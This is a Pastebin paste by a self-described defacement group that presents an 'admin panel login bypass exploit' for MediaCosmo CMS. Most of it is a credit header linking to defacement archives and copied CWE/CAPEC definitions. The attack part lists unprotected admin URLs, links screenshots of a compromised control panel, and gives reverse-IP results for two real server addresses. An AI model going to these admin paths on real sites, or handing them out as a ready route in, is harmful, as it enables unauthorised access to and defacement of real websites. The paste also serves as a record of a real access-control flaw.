KingSkrupellos

MediaCosmo CMS Improper Access Control

May 10th, 2020
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.79 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : MediaCosmo CMS Improper Access Control
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10 May 2020
  7. # Vendor Homepage : mediacosmo.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  12. CAPEC-115 [ Authentication Bypass ]
  13. CWE-284 [ Improper Access Control ]
  14. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  15. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  16. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  17. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  18. zone-h.org/archive/notifier=CyBeRiZM
  19. # Mirror-H : mirror-h.org/search/hacker/948/
  20. mirror-h.org/search/hacker/94/
  21. mirror-h.org/search/hacker/1826/
  22. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  23. defacer.id/archive/team/Cyberizm-Org
  24. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  25. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  26. aljyyosh.org/hacker.php?id=Cyberizm.Org
  27. aljyyosh.org/hacker.php?id=Cyberizm
  28. # Zone-D : zone-d.org/attacker/id/69
  29. # Pastebin : pastebin.com/u/KingSkrupellos
  30. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  31.  
  32. ####################################################################
  33.  
  34. # Impact :
  35. ***********
  36. CWE-284 [ Improper Access Control ]
  37.  
  38. The software does not restrict or incorrectly restricts access to a resource from an unauthorized actor.
  39.  
  40. CWE-287 [ Improper Authentication ]
  41.  
  42. Authentication is any process by which a system verifies the identity of a user who wishes
  43. to access it.When an actor claims to have a given identity, the software does not
  44. prove or insufficiently proves that the claim is correct. Improper authentication
  45. occurs when an application improperly verifies the identity of a user.
  46. A software incorrectly validates user's login information and as a result, an attacker can
  47. gain certain privileges within the application or disclose sensitive information that allows
  48. them to access sensitive data and provoke arbitrary code execution.
  49. The weakness is introduced during Architecture and Design, Implementation stages.
  50.  
  51. CAPEC-115 [ Authentication Bypass ]
  52.  
  53. An attacker gains access to application, service, or device with the privileges
  54. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  55. The attacker is therefore able to access protected data without authentication ever having taken place.
  56. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  57. through an authentication procedure. This is usually the result of the attacker using an unexpected
  58. access procedure that does not go through the proper checkpoints where authentication should occur.
  59. For example, a web site might assume that all users will click through a given link in order to get to
  60. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  61. able to reach secured web content by explicitly entering the path to the content rather than clicking
  62. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  63. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  64. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  65.  
  66. ####################################################################
  67.  
  68. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  69. ******************************************************************************
  70. This Software wants Administrator Username - Password.
  71. But SQL Authentication Bypass Payloads doesn't work.
  72. It says : Invalid user_id or password, please try again.
  73. There was an error logging in.
  74. Check your username and password and try again.
  75. So, we will jump over the wall.
  76. /admin/admin.php
  77.  
  78. /admin/page-admin-home.php
  79. /admin/admin-calendar.php?sub=list
  80. /admin/admin-calendar.php?sub=new
  81. /admin/admin-calendar-categories.php?sub=list
  82. /admin/admin-calendar-categories.php?sub=new
  83. /admin/admin-plugins.php
  84. /admin/admin-reports.php
  85.  
  86. ScreenShot Administrator Control Panel =>
  87.  
  88. https://www.upload.ee/image/11665574/mediacosmo2adminpanelscreenshot10052020.png
  89.  
  90. https://www.upload.ee/image/11665571/mediacosmo1adminpanelscreenshot10052020.png
  91.  
  92. Reverse IP results for (72.47.248.163)
  93. There are 6 domains hosted on this server.
  94. Reverse IP results for (64.13.235.9)
  95. There are 4 domains hosted on this server.
  96.  
  97. ####################################################################
  98.  
  99. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  100.  
  101. ####################################################################
Add Comment
Please, Sign In to add comment